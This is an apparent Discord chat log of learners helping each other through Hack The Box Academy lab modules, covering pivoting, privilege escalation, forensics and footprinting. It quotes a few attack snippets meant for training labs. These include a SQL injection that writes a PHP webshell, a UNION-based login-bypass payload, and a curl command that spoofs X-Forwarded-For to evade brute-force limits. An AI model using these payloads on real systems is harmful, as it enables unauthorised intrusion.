Subnet is 255.255.254.0

Would that network segment be down?

I’m on the 10.129.0.0 network so I should be able to get to that network

hi im doing Web Server Pivoting with Rpivot where i have to connect to the web server on the internal network. Submit the flag presented on the home page as the answer. but all i see is Apache2 Ubuntu Default Page

If you see that you should be there. Look closely. Look in different ways if that makes sense

i curl and checked the source code still no luck

any other hint?

Not without giving the answer unfortunately

yehh

i found

Hey guys,
Is someone is interested to some study group about cpts modules let me know in dm 💪

thanks mate

Pretty sure I had to curl this one to see the flag I can't remember exactly

we have to find another internal network within it

If that's a spoiler I'll delete but it really doesn't take away from what the learning objectives were

Hey I'm Unable to ping the target machine on my VM using OpenVPN.

getting error { Remote/Reverse Port Forwarding with SSH
}

read the error

done

Hi, I'm currently doing the linux privesc module and need some help understanding the python library path injection section. For the demonstration, am I just meant to edit the init.py ,,,,,,, I'm asking because it says to find a writeable directory so I can create my own module ,,,, however, it needs to be above in priority and I cannot find one to write my own custom module.

I have a little problem with my kali machine. When I use the "ls -la" command to list the documents in a directory, it does not list the creation/modification time of the file. I'm still a newbie and I need a little help

I still can’t pick that networks I have to log it with HtB support

hi have u solve this ?

sync clock with DC, look it up

i try
ntpdate 10.129.203.114
ntpdate dc01.inlanefreight.local
ntpdate inlanefreight.local
still got ntpdig: no eligible servers

I don't think 10.129.203.114 is the dc, it's usually in the internal network

ya i use 172.16.8.<> also

either ntpdate or rdate, or faketime with the time from nmap

first make sure you have access to the DC that you want to sync your clock with, add that DC ip and hostname to your host file (in this format (<target IP> dc01.inlanefreight.local inlanefreight.local dc01)
after that run this command: sudo timedatectl set-ntp 0;sudo ntpdate -u dc01.inlanefreight.local
(if you don't have either tool installed just install it with apt-get)

read each and all prolab description or even review if you want to go that far to get a basic understanding of what each prolab is about, but personally i'll recommended the Offshore Prolab if you want a big lab with lots of AD and zephyr if you just want pure AD

Guess it's busier cause of the holidays, I had no issues on Zephyr, maybe once and I had to wait for the daily reset, but now you can reset individual machines, so it should be even better

also switch servers if you're running into problems

since the update a while back you can't no longer check how many people is on each VPN server but changing the VPN server usually fixed the issue for me

hey

excuse me , i am stuck in session hijacking module XSS, can any one help me. thanks

solved after reset lab

someone can help me with this question?

Hi, someone who solved the skills assessment of Advanced xss and csrf exploitation?

i have been missen it the box

Can I ask for help with a question here?

you can ask for help here

Ah, I already asked in community help

Your payload for fetching script.js executes so the issue should be from the index.php file

Or the content of script.js is incorrect

actually the problem should be the content of script.js, try other payloads for grabbing cookies.

i have a question regarding the PassTheTicket from linux secion in password attacks

the last section in it is so confusing to me, what is all this port forwarding, proxychains stuff

why? 😅

what is the question

regarding the proxychains

why

Because you wouldn't be able to access the other hosts without that

It's a bit out of left field I guess, since it's before the pivoting module, but for now you can just replicate the steps

If you have a more specific question, I could try to explain

i m stuck here as well

PTT uses kerberos to authenticate, you need to be able to connect to the KDC to request a TGT, so proxychains is used to access the internal network, it's explained more in the AD module too

what abt chisel, so are we just forwarding that port and then the connection made to that port are being sent through proxychains? 😅

yeah i get that, but like i would have loved if they explained it more in detail, im hoping it will be explained more in the pivioting module

yep do the pivoting module and it will explain more

Chisel is a pivoting and port forwarding tool, you're pivoting through a host that has access to the internal network, it will all be explained in detail in the pivoting module, chisel along with many other ways to pivot

For the purposes of that module, it's just a proof of concept of how it's done, but doesn't go in depth

Hello, wondering if anyone could dm me regarding this question: "Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer." I guessed the answer right but I'm really itching to get a proper answer. thanks

okay thanks ❤️

also kinda strange that pth and ptt are in the module since they're not using passwords

Similar conceptually, they're still ways to authenticate, I'm guessing the only other place to put it is the AD module which is big enough as is

Hashes and tickets are essentially as good as a password

yeah I do think those would be a better fit in the AD module, but it's already very long

it wouldve been a 48 sections long module

dont remind me of that pls

im already bad at windows and AD and hate it, im feeling scary getting closer to it

It perfectly explains anything that probably scared you, so be eager instead 😂 Its the best part of the pentester part imo

i mean i am excited for it, but still afraid 😂

that module will get you better at AD, take your time with it

Uni got the time part DW

Hi, can someone help me with the windows attack module for Kerberoasting (first question)? Im stuck on trying to crack the hash. I already transported the spn.txt file to the pwnbox. The part that Im stuck on is after the hashcat from spn.txt... and I supposed to replace passwords.txt with the "Hint" directory?

yeah you should use rockyou

I'm doing the lateral movement/pass-the-ticket section of Password attacks and am a little confused. We grab the ticket encryption keys and combine them with a user NTLM hash to create a forged user TGT, right? So any services we request are made from that user, with their standard permissions?

I guess what I am asking is that all of the ticket forging/pass the ticket is for local, lateral user movement, correct?

Understandable
Only module rather section that has me a bit worried in advance is the Attacking Thick client applications section, and im only 2 sections away

yes, thought not sure what you mean by encryption key and combine with ntlm, ntlm is they encryption key

The NTLM hash of the user password is the encryption key for the tickets?

the ticket request, yes, not the tgt

Hey, on footprinting medium lab, i've mounted on the nfs but when i try to acess the TechSupport file says that i do not have permission

that is correct?

hey, a question, in the BROKEN AUTHENTICATION module ----> Weak Bruteforce Protections section, run the script they give you to perform bruteforce adding the X header, but it does not detect any valid combination.

navigate with su priv

focus on the x header nd not bruteforce

what section is that

@lusty thicket file upload attack assessment

I already put the x header, use the credentials you found in the previous question but nothing

You have to apply brute force, right? Or are the credentials the same and the only thing that needs to be changed is the IP?

the only thing to be changed is the IP

you don’t need to bruteforce

i recommend curl

You need the green.
Pro tip - upload just an image.jpg alwayys first then intercept with burp and start to mess around/pass to intruder.
You are getting that result (which you shouldve noticed) because your file doesnt pass the blacklist check/client side check

curl -s -X POST "http://83.136.250.104:40025/question2/" -d "userid=advantech&passwd=admin&submit=submit" -H "X-Forwarded-For: 192.168.1.100"

Okay let me go back - ty for the advice

Won't it be like that?

windows priv esc citrix breakout question I am unable to access shares from my kali. is this lab issue or skill issue ?

@supple gorge I figured it lol was using the walkthrough ip and not the target iPhone with the specified port hahaha such noob I am.😂

Im struggling with "MODERN WEB EXPLOITATION TECHNIQUES - SSRF Basic Filter Bypasses". Is someone available for PM? I think I am misunderstanding how the command reaches back to my machine.

the citrix target can only access the ubuntu machine

OHHHH MAAAN

I knew i am doing something stupid but this is the no brain cell moment for me

hi there, I'm stuck with the question of Env Enum from Linux Priv Escalation, any hint would be really good appreciate it...

Is Academy down for anybody else? Getting an error message and Ive been working on it for about 2 hours and got error when I submitted an answer so I refreshed page and got this

Error Code: 502

Got same error a minute ago

Thanks, I thought I broke it or something lol

Same x)

It's back for me

Hi

Same, just a. minor blip lol

Luckily it didnt impact deployed machines as I just finished final footprinting lab!

find and grep

in this case you know how the “sensitive” data should be

I want to start haking

So from were I can start

@sly dome with find & grep I found a file protected

grep 'HTB{.*}'

in every file of the system

I would start with THM, working through their Advent of Cyber calendar and then check out some of the modules on HTBA

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

That too

It happens glad you figured it out

@sly dome can I DM to not spoiler here?

yes

check your ip

why you put port there

:36390

something like that

hello, i need help at USING WEB PROXIES -> ZAP Scanner. How do I get the high-level vulnerability? I need a hint. EDITED: I found it, I used ZAP locally

Now am getting same error on ubuntu ip

make sure the smb server is running and the ip is correct

can someone teach me to hack?

if its even possible for me bc i’m on ipad

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

thx

hi, i got a question about Footprinting Lab - Medium, can anyone help about NFS shares permissions

nvm on my ask - i figured out the issue

hi, I am on this SA right now, what tool did you end up using? I have found all the same information you mentioned:
username, 500 error codes with certain payloads in password (and username) parameter, and /token page does not error the same way as the other endpoints, (ie missing parameter error)

Switch to root and you can access

Roger that, did the job, thanks!

How long is this command supposed to usually run:

" Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y"
https://academy.hackthebox.com/module/143/section/1420

until you have captured the hashes, same as responder

how long did that take you?

don't remember, did that module a long time ago. open another terminal to cat the file

I just transferred the file via xfreerdp drive mount

¯_(ツ)_/¯

in the IMAP/POP3 module the for the question What is the admin email address? I try to connect to the imaps server but then all the commands I enter come back with * BAD Error in IMAP command received by server.

it should take about 5-10 minutes to grab all the hashes required - let it sit for a few

iirc it's interactive if you hit q and you can run the outlined commands to check info from the section @cedar void

it's either invoke-inveigh or inveigh.exe that's the interactive one

imap commands need to be prefixed

1 <command> <args>

as shown in the example commands given

#modules message

i linked to an article a long long time ago when i was going through it that goes over the full commands in more detail

I tried several 1,*,A1...
e.g. 1 LIST "" *

are you logged in as the user?

also there is no IMAP/POP3 module, are you referring to the Footprinting module, with the Section IMAP/POP3?

Yes correct. sorry

Hey i'm at the Windows Event Logs & Finding Evil
Skills Assessment and I'm not sure to understand.

Maybe its a dumb/unclear question but if someone can dm me I can give more details

what command are you exactly running; you should be able to check most commands; but like I said if you're not Logged In as a user it might not let you

I think that is the problem. I try to figure out how to login but dont know the user/pw

read the section carefully it gives you the username password

hint: it's related to the user you enumerated in SMTP

:)

I can't give too much there since it's a part of the answer

this has nothing to do with academy modules read #welcome

ok my bad

there is a #homelab-sysadm channel that you will be able to access if you read and follow instructions, that'll probably be the better place to ask

that or #1024429874246590575 if you're lazy but can't guarantee there will be someone to answer

ok thanks

In this module what document viewer should we use?
I have the password of the .docx but the Atril Document viewer on the pwnbox doesn't support the file with password.

https://academy.hackthebox.com/module/147/section/1335

try with Libre Office

Let me install it then try.

hi im learning footprinting module and i stuck on smb section, how can i access share folder with rpcclient

i tried netshare command but it doesn't work

rpc client isn't for enumerating shares iirc; just use smbclient

smbclient //IP/folder

smbclient -U "" -N //IP/share

thx. I didnt see that.

A mistake installing it using the official guide.

Hi im facing an issue
Once im spawnig target i dont see IP
On the top left i can seee active target
When im trying to start one more time im receiving error saying "You don't have enough permissions to create a genesis."
Anyone can help ?

I reloged, cleared cache etc nothing helped

should just be able to do sudo apt install Libre-office or office-libre or whatever it's called

i also think it SHOULD be there by default

yes, but also works when leaving pw blank through promt

-N tells it not to ask for password

;)

ye i know 😄

└──╼ [★]$ sudo apt install libre-office
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package libre-office

└──╼ [★]$ sudo apt install office-libre
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package office-libre

Found the correct one, libreoffice

👍 generally it's best to install things directly through APT to avoid dependency issues as sometimes the website holds a later version that is on a different dependency

ty yall

Libre also having issues on the pwnbox with apt also

if it's not already installed by default idk what to tell ya bud ¯_(ツ)_/¯

i use my own vm so i haven't cared much about the pwnbox dependency stuff

Okay, might try and transfer document to main windows desktop

maybe it's time to make a windows vm

Sadly I can't utilize the vpn due to high latency

fun fact you can ssh to the pwnbox and use scp to copy files

generally don't transfer unknown stuff to your host, academy stuff is safe but still best practice

in the format scp pwnboxid@pub-ip:/path/to/file ./ i believe most current versions of windows has ssh installed by default

but it doesn't take long to figure out how to install

Didn't know that, thanks.

unfortunate but i take it you've tried on other regions for vpn latency issues; you're not in US or EU i'm gonna assume

Yes

I believe its the Pro versions of windows which have it installed by default

it's specific version # and after that have it installed if i'm remembering the dumbshit wheel

creds for your pwnbox are on the desktop btw

Could someone help me understand how billing discounts for Cubes are calculated. Under 'Purchase Cubes', I see I can purchase 200 cubes for $20. Under 'Monthly Billing' in the Silver plan, I see 200 cubes each month for $18, which amounts to a $2 discount over the 200 for $20 price (a 10% discount). However, the Silver billing plan lists this as an 11% discount. How did they come up with 11%.

I am at Using Web Proxies -> Skills Assessment, question 3. I need add one alphanumeric char to to the 31-characters cookie and I need to encrypt the hole cookie, but how can I add the char and encrypt the cookie in one time in burp intruder? I tried 'cookie=§3dac93b8cd250aa8c1a36fffc79a17a§char§§' as a payload in burp, but in this case only the char is not a payload. How does this work?

I'm still having problems in
Windows Event Logs & Finding Evil
Skills Assessment
By examining the logs located in the "C:\Logs\DLLHijack" directory, determine the process responsible for executing a DLL hijacking attack. Enter the process name as your answer. Answer format: _.exe

I'm not sure to understand how to this correctly theres a lot of logs and since I'm not the one who's doing the dll injection like in the exercices I can't really search for a specific dll or a process.

#modules message

Knew it, thanks anyway.

Finished the medium lab

Starting the hard one.

Why can't I ping the target IP form the pwnbox?

Possibly the target has a firewall, depends on the room

In Footprinting Module, Chapter DNS, i dont understand the question clearly

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

what do they wan as an answer

the FQDN of the DNS server

What am I missing here? If I buy 500 cubes, I pay $50. If I buy a Gold plan for 1 month (which includes 500 cubes), I pay $38. That's a 50-38=$12 discount, which is 12/50*100=24% discount. The Gold plan says it's a 27% discount. Are the cubes in the Gold plan valued differently from the cubes I purchase separately? @Wnted's earlier linked answer didn't seem to answer this question.

I was reading recently that there are some better promotions. Buying a plan is better if you can. Even buying something lie the Gold gives you lots of access. It can open up everything for a path and you get an exam voucher. Unless you are a student, where it is like $8USD a month and you get access to everything Tier II and below included

a month of plat + a month of gold gives you access to a full path iirc, don't read into the % discount too much

I think the exam voucher is only included in the Annual plans, not the Monthly plans. If the "Unlimited Pwnbox usage" that comes with the Monthly plans somehow increases the value of the cubes (if it costs more cubes to use a Pwnbox if you're not on a monthly plan) then I could see why the discount could be viewed as a higher percentage. However, the Academy FAQ section says that "buying any amount of cubes in Academy's billing page" gives "unlimited Pwnbox access", so that explanation doesn't make sense. My guess is that their discount percentage information is just out of date, which would not surprise me given that some of the links in the FAQ page don't even work any more (like the one at the end of the 'What is HTB Academy?' question.

Just do platinum, it's the best deal, unless you can buy Gold annual right now with the discount and will be super committed the coming year

I believe the % discount is based on some old stuff they were doing

That is the point I was making. It does not make sense at all. If you break it down, it might be cheaper to get cubes. They seem to have specials. I would not worry about discounted like previously said. Get what you can afford. Or, use an old school email, lol.

it still ends up cheaper even adding the $210 for the voucher

annual plans aren't really worth it

*gold annual but yes this

Yes, my bad, will edit

Thanks. Sounds like good info. One more question: if I buy a Monthly (Gold?) plan which gives me 500 cubes, what happens if I don't use them all by the end of the month - do I lose them, or do they carry forward into the next month?

you won't lose the cubes, spend them whenever you want

With a student plan, you do not need to worry about the cubes for lower tiers, and bank the cubes you win to get the better items.

Yes, it does look like the info on the billing page is old. I just came across some updated information ('Updated over a week ago') in the Help section: https://help.hackthebox.com/en/articles/5720974-academy-subscriptions in which it refers to a 10% discount for Silver, and 24% for Gold, which matches my calculations.

trying to determine the CMS in the active recon

Iirc there's some flags you can use with whatweb to give more detailed info, it's in that section I believe

thanks....I dive into whatweb deeper

It took me over four hours to get pass SQL INjection Fundamentals. The shell is what was giving me the most issues for some reason. Did anyone else have issues getting the flag that was "one directory away"?

which wordlist should i use in Footprinting / DNS last question?

upgrade to a better shell if you're using the shitty injected webshell

I was following the instructions because I thought we had to. I was using the shell.php one we are told to create. I could have sworn I had done other modules that were much easier getting in there.

if you have that you can just use a revshell oneliner, makes it much easier to do anything

Can some one help me with the skills assessment 2 for the 'introduction to NoSQL injection' module? I have found the following information right now and could use a nudge ||1. enumerated username 2. 500 error codes with certain payloads in password (and username) parameter on the /login. 3. /token page does not error the same way as the other endpoints, (ie missing parameter 200 error). ||

Got it. I will try that next time. Right now, I am going through the whole program getting the jist down, and will go back over everything to make sure I get it done. I hope to get to the big box boxes soon, lol. An example of what they showed was cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'--

so you have username / password?
if i remember right go to the password reset page and look for the missing parameter name

should juse be the one given in the section

the hint says, that different wordlists may have different entries

I just have a username from the /forget endpoint, but no password. doesnt look like there isnt any other parameter other than the 'token' param

try the others in that dir then, dns-Jhaddix should have it

ima look up my scripts, sec

2 hints, subdomains of subdomains, and be fierce

use the fierce wordlist from seclist

thanks

the /login endpoint is right
i made a script that uses some javascript injection in username value

basicly nearly the same script as told in automating serverside javascript injection

ok, is there even a point for the /reset endpoint?

yes that comes later at the end

sounds like not if i just need to use ssji on /login

ok sounds good, ty

its nearly 1 year ago since i did this module, so dont nail me down

as i remember right || extract username then request a pw reset for this username, extract pw-reset-token, enter new pw, login as that user||

@lusty hearth

@buoyant escarp would you mind dming your script to me for the ssji? because it doesnt make sense to me why I would need to log in, then reset an account.. unless its for some super user privs or information that will enumerate me further for the flag

@lusty hearth sent

ty

thx ima try

trying to get a successful whatweb scan against the app.inlanefreight.local

getting errors

Anyone around who can give a nudge/assist for the predicatable reset token in broken auth module? I've tried every permutation of approach I can think of and still spinning my wheels.

trying to scan this vhost app.inlanefreight.local with whatweb

i keep getting errors

ty

I still need help

Read the section again, you should see what to look for

can I dm you ?

Well you can just post here

Its probably a part of the answer so I don't think I can post it there

Use spoiler tags

| 2 of those on each side of your text

So I did this command || Get-WinEvent -Path 'C:\Logs\DLLHijack\DLLHijack.evtx' -FilterXPath "*[System[EventID=1]]" | Select-Object TimeCreated, Message | Format-Table -AutoSize || But i'm not sure if the eventid i'm specifing is the good one. If I've understand correctly it should be this one since I can't find any id 7 probably because of spoofing and i'm not sure how would I know wich one of the is the dll hijack between all the results. Do I need to check for each process wich dll is suppose to be executed ?

Need id 7

Did you open the logs correctly?

but when I check in the logs with id 7 I get nothing and I have || put the ImageLoad to exclude ||

If you correctly open the logs in event viewer, you’ll see 7

Don’t open it from file explorer

Need to open it from within event viewer

Ok I think I did something wrong because now I see them

But I'm still not sure to understand how am I suppose to know wich one in these 800 logs is the dll injection. I don't get that much information in the event viewer. And I don't really have tools to get non real time information

Go back through the section in that case

I already did that a lot of time and I don't get it do I just need to search for || wininet.dll || ?

Look at the section

There’s a difference between the correctly signed by windows event 7

And the one with the find calc.exe

Yeah I've try it but I found nothing not signed
|| <QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID=7)]]
and
*[EventData[Data[@Name='SignatureStatus']='Unavailable']]
</Select>
</Query>
</QueryList> ||

||Just filter event id to 7 and use find for unavailable?||

im in Footprinting/SMTP, second question, the Hint says it provides a wordlist so i can check for existing users, but i dont see which wordlist? am i blind ?!

In resources

There’s a footprinting wordlist

ahh thx

Make sense I was searching too far for no reason

But when I enter || mmc.exe || its not the answer

Because it isn’t

should i enumerate manually by typing VRFY username when connected to SMTP via nc or telnet ?

Can someone help me with a general problem happening rn

is that general problem module related

uuuuh yee

what module and section

linux fundamentals

Read the section again

cool whats the question

on files and directories

so im doing the questions but i cant get past it because as of now im trying to connect with ssh

but there is no port 22 to the ip

i already tried diff ips to connect to the target but its giving me the same error :'{

you mean the part with web proxy, then automate it via http?

I mean the part where they use metasploit

Or the part where they use smtp-user-enum

But for the latter you should use -w 25 otherwise it won’t find it

Msf should have no issues

oh okay, in this section there is no mention about metasploit, so i didn use it

@thorn urchin should i try and connect with another vpn ? 0.0

It’s not under “footprinting the service”?

what are the exact connection instructions it gives you

trying to connect with ssh, im restarting my vm rq =.= ill tell you the message exactly

Might have put it in my notes myself

You’re right, it’s not in the section

@thorn urchin "ssh: connect to host 10.129.93.88 port 22: No route to host"

Anyways

that was weird 🤓

alright then im just using metasploit

no I asked exactly what the section instructions for connection was

In msfconsole you can use auxiliary/scanner/smtp/smtp_enum

Ive not done the linux fundementals module so I want to know exactly what it said before I can give accurate advice

excuse me for being a bit of a freshy >.< but its section 79 File Descriptors and Redirections

all the questions require you to connect to the target with ssh

it would work fine with every other section but this one

ty

then yeah I would redownload and connect with vpn again

make sure to kill all other openvpn connections first

ahh okioki, ill try that rn 🫡

ill tell you what happens

yippeee it worked :P,, i changed server and reset the target ip

tyty @thorn urchin

np

I just red the module again I don't get it it's || mmc.exe || whos identified as the image

men that SMTP is slow to scan

It’s not that

Did you filter id 7 and use the find function for unavailable ?

yes I did

You only get 1 result?

I get multiple results but they all gave me the same things

example || Image loaded:
RuleName: -
UtcTime: 2023-12-28 13:01:00.651
ProcessGuid: {52ff3419-718b-658d-2c01-000000001000}
ProcessId: 7772
Image: C:\Windows\System32\mmc.exe
ImageLoaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll
FileVersion: 4.8.4536.0 built by: NET48REL1LAST_C
Description: .NET Framework
Product: Microsoft® .NET Framework
Company: Microsoft Corporation
OriginalFileName: System.dll
Hashes: MD5=AEDE4CAA11B58AC71D6CC7131FB025AB,SHA256=59827DC145773F249AFFDB1B480F9F00A43C544CCDA8CA6728BC7197A2F0C652,IMPHASH=00000000000000000000000000000000
Signed: false
Signature: -
SignatureStatus: Unavailable
User: DESKTOP-NU10MTO\Administrator ||

I’m starting machine

Can someone give me a hint or so on how to complete the advance command obfuscation section of command injections module? I ran this so far but nothing. My Base64 is on the right in the text starting with find...assuming find is a command like cat and not just something else

I just did a refresh I got other process but but they don't work either

I found it without issue

Did you open the log file with “open saved log” within event viewer?

DLLHijack log file

I filtered event id 7

Used find to search for unavailable, 1x find next had the answer

Just found it

I don't know why I wasn't seeing it before

I tried a couple of them and finally found the one

Thanks for your time

hi guys, having some troubles with on abusing http misconfiguration advanced cache poisoning attacks. seems like my payload is getting html escaped. Any advice? Thanks!

Anyone working on the ADCS module?

I've done it, what's up

Not stuck but that Active Directory is a little too hard lol

You get used to it over time.

That’s for sure but you’ll have your moments lol

embrace them

Definitely

Hi, about "Injection Attacks-Skills Assessment", my ||pdf|| injection is filtered I cannot bypass it, could I get some help ?

Good evening everyone, I'm a fairly new member to HTB but have completed Tier 0 of Starting Point. That being said, Tier 1 Responder is giving me some hassle. I am attempting to use Responder but when I type in the website mentioned on page 8 of the walkthrough, it loads with the correct website but Responder doesn't pick up the traffic so I cannot progress. Has anyone else gotten stuck on it?

Edit: I see a better place to take this so I'll move the question there.

stuck in last step of Exploiting Web Vulnerabilities in Thick-Client Applications, sql injection

question, why does john sometimes exits sooo fast

im doing the protected archive section in password attacks,

tried a couple of wordlists, mutations, but like john exits directly after the command, why? 😅

solved it!
but im still wondering why did john sometimes exited directly?

I remember that one. My notes only say to follow closely the steps. I think I had to redo a few times to make sure I was a following what was outlined properly. Also one thing to that tripped me when I was redoing steps and not restarting is when moving files; I thought I was moving and replacing contents with those that were compiled but wasn't already.

Could someone give me a push in the right direction for the Windows Event Logs & Finding Evil - Skills Assessment Q3?

Yall know why the target site won’t work for https://academy.hackthebox.com/module/35/section/227

@burnt stone

Or anyone

Who can help

hi, this module said we need modif htb/fatty/shared/resources/User.java file, in public user
but there are a lot public user, should i modif first function then delete the rest ?

Stucked on LINUX PRIVILEGE ESCALATION: Containers

Question:
Escalate the privileges and submit the contents of flag.txt as the answer.

I tired as per the module says but when I run the last command it always says Error.

Can anyone help in this ????

I don't recall exactly which one I replaced for that. I don't recall deleting the others. There was one I believe that was used for setting the values in the parameters.

Ahhh found the solution

ok, i'm not delete the other

this one right ?

then

C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\shared\resources\User.java

then

cp fatty-client-new.jar raw\fatty-client-new-2.jar
extract

then

mv -Force fatty-client-new.jar.src\htb\fatty\shared\resources\*.class raw\htb\fatty\shared\resources\

then

jar -cmf META-INF\MANIFEST.MF traverse.jar .

run
login with

abc' UNION SELECT 1,'abc','a@b.com','abc','admin

Spoiler!! use ||/bin/sh||

I completed the footprinting lab easy, but only because I read a tip to use FTP with a certain port, I'm just wondering where was I able to get this information without the help of a hint from here?

Always look at all the ports and then think about what you can do with them.

Every non-standard port is worth a closer look.

nvm solved

So Nmap port scan and figure out theres a strange port ?

Not necessarily strange, just non-standard

Thanks, this helps with future tasks 👍

Hello i need help in digital ossian website? Anyone

Which HTB Academy module is this?

I don't know whether the time in the header and the time displayed on the website are the same.
The time you need to use is displayed on the website

Processing a curl they seem to be the same

So I have to get the time shown on the web?

When you are on the website, you can click a button, right? This generates two tokens. It shows you the time and tells you that the other token was generated within +/-1 second

hi guys. Sorry for the simple question but im on module 'Windows fundamentals' section 'skills assessment.'
I'm tasked with making a security group called HR but I can't figure out how to do it.
I tried following the steps in this link but i couldnt navigate to anything it asked me too https://its.uark.edu/campus-it-resources/identity-access/active-directory-ou-security-groups.php

Can I talk to you via DM?

I am only online very sporadically.
If you can wait until tonight, you are welcome to send me a DM.

So.. i have finished the entire for the Windows Event Logs & Finding Evil - Skills Assessment except Q3... could someone give me a hint in the right direction?

should be in the module but either https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11) use the command line or computer managent from gui

the link you found applies only to domain joined machine

much appreciated man ty for taking the time to reply

Footprinting Lab - Medium: Trying to log into the SQL server, is it somehow down, or am I doing something wrong:

hi, i just finished that section too. so for now, there is no need to understand how the proxychains and chisel work but just replicate the steps? it will be taught further down the road?

pivoting module will go into detail on those

ok thanks!

try running as admin

Started course: Windows Fundamentals, but I have a problem with keyboard layout in windows machines. So the keyboard is probably American one, but I live in Europe and my keyboard is with Nordic layout so I can't really type special characters and it sucks. I tried to change keyboard layout from the windows machine itself but it is not connected to the internet so I couldn't do that. Any solutions?

run the application as admin with the sa creds you found

Module name: Windows Local Password Attacks / Credential Hunting in Windows

I am struggling to find the password Bob uses to connect to the Switches via SSH.

I've uploaded laZagne and run the find command so I am pretty sure i've uncovered all of the files - but I can't find any passwords that i've not already tried before

Is somebody please able to help?

Damn I'm lost, I only found Alex's credentials not admin

there’s a important.txt file on that host

just look around files and folders manually, you don't need lazagne for this

Thanks for the nudge, i've got all the other questions answered and this is the last one! I thought I had it a few times but I can't find anything relating the the two ssh commands bob uses

it's just in a file in a very conspicuous folder, think it was even pinned to Quick Access

Thank you!

Use what you’ve learned from question 2

okay figured it out, what a dumb issue. ctrl + alt + 2 would not work so had to change to korean keyboard 😅

Thanks got it.

More issues with footprinting lab - Medium: I'm now logged in the mssql, but all I get is columns as results, no data seems to be in the database, what am I doing wrong now? select * from dbo.accounts;

this give me empty colums; name | id | password

read the hint

drawing blank, I'm logged in as administrator and I need to log in as another admin?

you’re logged in the right account now you just need to find the right query for the information you’re looking for

this is insane, I went to hell and back just to get here lol

Accounts is not the right table

It's the only table under the entire WINMEDIUM, I'm in the right place though ? Never used this mssql before

It says dbo.devsacc in my notes

Seems like it does not exist:

Let me start up the box

It's here though:

did you USE <database>

Does nothing, and cant find the database

or SELECT * from [accounts].[dbo].devsacc

you need to fill in the database name yourself

Works fine for me

This is weird, mine would not work with this exact command, but managed to get it to work with: SELECT * from [accounts].[dbo].devsacc. I don't know what was the problem there, clearly am not familiar with the syntax, thank you all for help, managed to get it 👍

Jesus, what's the hard one going to be like 😶

that's probably because you didn't choose the DB to use, but yes it's a syntax problem

if you have selected the DB then select * from dbo.devsacc should work

Ahh, so I should have done like use accounts; or something similar?

yep give that a try

Hey, I am at Using Web Proxies at the Skill Assessment, question 3. I need to add a char to the 31 characters long cookie and then I need to encrypt the cookie in reverse order. But how can I add a char to the cookie and encrypt that in one step? I tried this in burp intruder §3dac93b8cd250aa8c1a36fffc79a17a§char§§ but in this case only the 'char' outside of the range. How can I do this?

try aHR0cHM6Ly95b3V0dS5iZS9kUXc0dzlXZ1hjUQ==

base64

how did you get this?

did you decrypt it than you now it

yeah thats really usefull, thank u xD

use cybercheff is very usefull

https://gchq.github.io/CyberChef/

don't you know it either? How I use burp intruder that this works?

They're messing with you, just a rick roll, super original

Not on the computer right now to check my notes but I tinkered with intruder and custom iterator

o this was wrong question use the wordlist "alphanum-case.txt" and try 3dac93b8cd250aa8c1a36fffc79a17a§char§ and i dont remember corektyl but you need to set up payload encoding

in this case I encode only the §char§, but I need to encode the hole thing, 3dac93b8cd250aa8c1a36fffc79a17a + the §char§

Can someone who has finished the SERVER-SIDE ATTACKS module help me I can't even install it

it dosent was a payload encoding. set a payload prossesing add-> hash md5

the payload is only the §char§, not the hole cookie. Is there a possibility to encode the hole cookie in burp?

@lusty thicket I'm doing it from the beginning. If not, can you help me?

i may be able to help if i knew the problem

atacktype cluster bombe 1 payload the char use wordlist 2 payload the whole cookie use md5 hash

@lusty thicket I did everything from the beginning and this time it worked thanks

but this does net show up correct cookie=§3dac93b8cd250aa8c1a36fffc79a17a§char§§, this §3dac93b8cd250aa8c1a36fffc79a17a§ is one payload, the second payload is empty §§

o i see then i dont know.

have you try to read the htb forum sumetimes it is very usefull

I try that out, thank you

No problem

@lusty thicket upstream tomcats {
server 94.237.62.195:43552;
keepalive 10;
}
server {
listen 80;
location / {
ajp_keep_conn on;
ajp_pass tomcats;
}
}

I added my file into nginx.conf but
type sudo nginx
nginx: [emerg] bind() to 0.0.0.0.0:8080 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0.0:8080 failed (98: Address already in use)
I'm getting errors

http {
upstream tomcats {
server 94.237.62.195:43552;
keepalive 10;
}
server {
listen 8080;
location / {
ajp_keep_conn on;
ajp_pass tomcats;
}
} my configuration is like this

use you pawnbox or your one maschine

in pawnvox you cant use port 80

Is anyone able to help me with the module Attacking Common Applications - Attacking Thick Client Applications ive been stuck on it for ages and cant seem to get the same results shown in the module, i cant even find any MAP - RW within the memory

is this from the pwnbox?

follow the exact steps as the section

i have been and i doubt i missed anything, i changed the permissions of the temp folder as it said changed the preferences of the debug app ran the application a few times everything and nothing past the memory dump part

also check walkthroughs for the fatty box

Thanks the Fatty box wasnt the one i needed but rather the PivotAPi box, i saw it mentioned by someone else in the discord when mentioned with fatty box after doing a CTRL+F

oh you're doing the first part, my bad, you'll need fatty for the section after, good luck

module: LINUX PRIVILEGE ESCALATION, Escaping Restricted Shells. I solved this one by adding something to the ssh command. was there an other way since this solution was not found in the theory above the question

Hey need some help with "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download." in the Wordpress section i have a reverse shell and can't find tihs flag

find /path/to/search -type f -name ".sh" -exec grep -E 'HTB{.}' try this string, maybe remove the .sh and then you can see which file caontins the flag..

no luck I also tired grep -rn "HTB{" / 2>/dev/null but only found the other two flags

you can always redirect the content of the flag.txt to the echo command echo<<<$(flag.txt)

‘use a vulnerable plugin’

found it thanks all 🙂

